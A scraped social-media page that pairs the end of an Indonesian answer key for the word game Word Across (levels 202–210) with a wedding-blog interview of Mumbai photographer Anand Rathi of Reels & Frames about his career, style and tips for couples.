Khan, Khat, Kat, Nth Level 202 Grief, Fire, Rife, Ire, Rig, Fir Bonus Frig, Reif, Erg, Fer, Fig, Gie, Ref, Reg, Rif Level 203 Smart, Arms, Arts, Mars, Mast, Mats, Rats, Star, Tram, Arm, Art, Mar, Mat, Tar, Rat Bonus Marts, Trams, Mart, Rams, Tams, Tars, Tsar, Ram, Sat Level 204 Finds, Find, Fins, Din, Dis, Fin, Sin Bonus Difs, Dins, Fids, Dif, Fid Level 205 Mouth, Moth, Hot, Hum, Hut, Out Bonus Thou, Mho, Mot, Mut, Ohm, Tho, Tom Level 206 Story, Rosy, Sort, Toys, Rot, Soy, Toy, Try Bonus Ryots, Stroy, Troys, Tyros, Orts, Rots, Ryot, Tors, Tory, Troy, Tyro, Ort, Sot, Sty, Tor Level 207 Beams, Base, Beam, Mesa, Same, Seam, Sea Bonus Bemas, Mabes, Bams, Bema, Maes, Abs, Bam, Bes, Mae, Sab Level 208 Stalk, Talks, Last, Salt, Talk, Task, Ask Bonus Alts, Kats, Lats, Skat, Slat, Alt, Kas, Kat, Lat, Sal, Sat, Ska, Tsk Level 209 Cards, Arcs, Card, Cars, Scar, Arc, Car, Sad Bonus Cads, Rads, Sard, Scad, Ads, Rad, Sac Level 210 Doors, Door, Odor, Rods, Rod, Sod Bonus Odors, Ordos, Roods, Dors, Ordo, Rood, Dor Nah itulah tadi semua Kunci Jawaban game Word Across terlengkap dari level 1 sampai dengan level 210. Kabar Games akan mengupdatenya kembali jika telah menemukan kunci jawaban ke level lebih tinggi lainnya, jangan lupa baca juga kunci jawaban Tebak Gambar, TTS Pintar, TTS Jenius, Brain Blow, Stump Me dan Tebak Tebakan 2020! Nantikan terus berita terbaru dan terupdate seputar game dan gadget hanya di Kabar Games. (function(d,a,b,l,e,_) if(d[b]&&d[b].q)return;d[b]=function()(d[b].q=d[b].q;e=a.createElement(l); e.async=1;e.charset='utf-8';e.src='//static.dable.io/dist/plugin.min.js'; _=a.getElementsByTagName(l)[0];_.parentNode.insertBefore(e,_); )(window,document,'dable','script'); dable('setService', 'kabargames.id'); dable('sendLogOnce'); dable('renderWidget', 'dablewidget_KoEP9KXB');
https://www.kabargames.id/cobain-nih-6-tips-farming-mobile-legends-biar-cepat-kaya/
#TipsTrick #MobileLegends
0 notes
mulondonposts-blog · 6 years ago
Photo
Tumblr media
Looking for the best Mumbai wedding photographers? We get you up close and personal to Anand Rathi of Reel and Frames and his team. The phenomenal team that captured the ‘everyday phenomenal’ couple Sonam Kapoor and Anand Ahuja’s wedding!
Whether you’re looking for a Mumbai wedding photographer or simply the best in India, you can’t get better than Reels and Frames. Here we bring you everything from their journey and photography style, to their top tips and advice for couples!
Did you choose Candid Wedding Photography or did it choose you?
Dreamy
Neither! To say art was my calling will be exaggerating things. I guess, what drew me towards photography (initially) was that I could decode photography in terms of its technical building blocks for eg. rule of thirds, leading lines etc.
Royal Moment
Coming from an engineering background, perceiving things in such manner came naturally! It was only later that I began to see beyond the technical aspects and that is when photography truly captured my interest.
Pretty in Green
And then, wedding photography happened very late for me. I started as a nature/environment photographer shooting landscapes and people in my college campus in New York during my MBA days. Soon, my classmates noticed and requested me to ‘put’ them in the pictures!
Love-struck
Given most of my classmates were married (very typical in an MBA school in USA), this was my first taste of ‘couple shoots’. When I came back to India, I kept working as a treasury manager by the weekdays and a hobby photographer by the weekends, until one day when a friend asked me to ‘carry’ my camera at his wedding!
Bridal Glow!
I clicked some photos and the response was phenomenal! I started taking up more weddings and the weekend warrior regime began. One fine day, I took the leap of faith and jumped into photography full time and the rest is history (in making!)
What is unique about your photography style? How do you stay authentic to your style?
Our photography style is what I’ll call ‘environmental portraits’ where a lot of focus is also to capture a sense of where the subject is.
All Out for LOVE
For eg. if we are doing a prewedding shoot in the cherry blossoms, we’ll show the trees in their full glory along with the couple.We stay true to our style by taking a step back and observing where we are first, before we start clicking.
What, according to you, are the wedding photography trends for 2019?
The Butterflies in Tummy
Less poses, more emotions! Everyone is done with over the top poses and ‘statue’ moments. Clients are appreciating true photojournalism more and more and we believe this will continue.
As a wedding photographer, what do you focus more on – moments or people?
A healthy mix of both!
Heart-touching
As a company, we believe that even a ‘group portrait’ or a ‘family portrait’ can be done tastefully. And it should be done tastefully, it is often the family portrait that makes it to walls.
How important is post production editing to you? Do Indian clients understand and appreciate the effort between raw and edited pictures?
Let’s seal it with a Kiss
In the digital space, sometimes the difference between a good picture and a great picture can just be the ‘edit’. Even more so in video. Clients do understand the effort, especially when they receive the final pictures.
What is more challenging – videography at weddings or candid photography? What’s new in wedding videography?
Beauties in White
While each has its own challenge, shooting videos comes with a couple of added challenges. Shooting video is like clicking 25 pictures in one second, each one of which has to be perfect.
Finally Yours
Secondly, video requires a lot more editing effort, because we as editors try to weave the story together using numerous permutations and combination after reviewing the footage. And therein lies both the challenge and the fun!
What do you love capturing more – preweddings or weddings?
Family Focus
Both equally. Preweddings are an ice-breaker with the couple and a fantastic opportunity to shoot in a controlled environment. While weddings provide a plethora of raw emotions and are spontaneous.
Three questions a couple must ask before booking a wedding photographer?
Black or White
How would you define your style?
How can we combine your style and our personality type seamlessly?
What are some of the things you would suggest to help us get the best from your services?
 Your top tips for couples to be?
Saat Phere
Manage your time well during the wedding days.
Don’t micro manage the event details.
Try and let your hair down and forget the first point while you are at it!
 Which is your favorite wedding from last year?
Everyday Phenomenal
Sonam Kapoor’s wedding was definitely a party to remember!
 Your most memorable couple ever?
Silhouette Love
Honestly, I won’t be able to pick one. So many of them have become friends and its hard to chose!
 Which is that one location/destination you’d love to shoot at?
Magnificent
Umaid Bhawan palace, Jodhpur is one place that we love going back to again and again.
Have you ever faced any last minute crisis at a shoot and how did you overcome it?
All the time. Shooting events is like firefighting!
Shower with Haldi & Beer
We’ve dealt with issues from kids breaking our drones, to camera equipment being stolen, to our camera getting drenched in unexpected rains! Fortunately, we have a policy of carrying backup of everything. Plus, we are a big team so this allows for last minute replacements.
When you are doing couple shoots, most people are shy/nervous in front of the camera. How do you make sure your clients are comfortable?
That ‘Varmala’ moment
We try and think of ourselves as friends of the couple (friends with a really fancy camera!). The chats that follow put the couple at ease and post that it just flows.
Not all clients are creative or bold. How do you manage to create a balance between your creative instincts & clients’ demands?
Ensuring that clients chose us for our style and not our ‘brand value’ is the first step to achieving coherency.
Togetherness
The second step is having a detailed discussion with the client on how they want their wedding photos to look and trying to figure out how we can achieve that within our style.
With so much traveling, how do you manage a work – life balance?
That department is a bit of a stinker!
Here comes the Groom
Last year I took about 105 flights and this year 15 will be done before the first month ends. But when work is passion and passion is work, who can complain?
There you go! That was our heart to heart chat with leading Mumbai wedding photographer Anand Rathi of Reels & Frames, that brings you everything you need to know about them. Love them? Let us know why in comments below…
The post Leading Mumbai Wedding Photographer & our Hot Favourite this Month – Reels & Frames! appeared first on ZoWed.com | Blog.
Posts you might like to read
Superhit Mehendi Ideas to make it more Personalize...
views
Up Close & Personal with our Favourite Weddin...
views
Mehendi Decor Ideas that are Ruling this Wedding S...
views
Skincare Routine for Brides-to-Be… Get going...
views
Top 10 Maangtika Designs you MUST check out!
views
Top Trend – Floral Hairstyles for Brides!
views
jQuery(document).ready(function( $ ){ jQuery('.yuzo_related_post .yuzo_wraps').equalizer({ columns : '> div' }); });
0 notes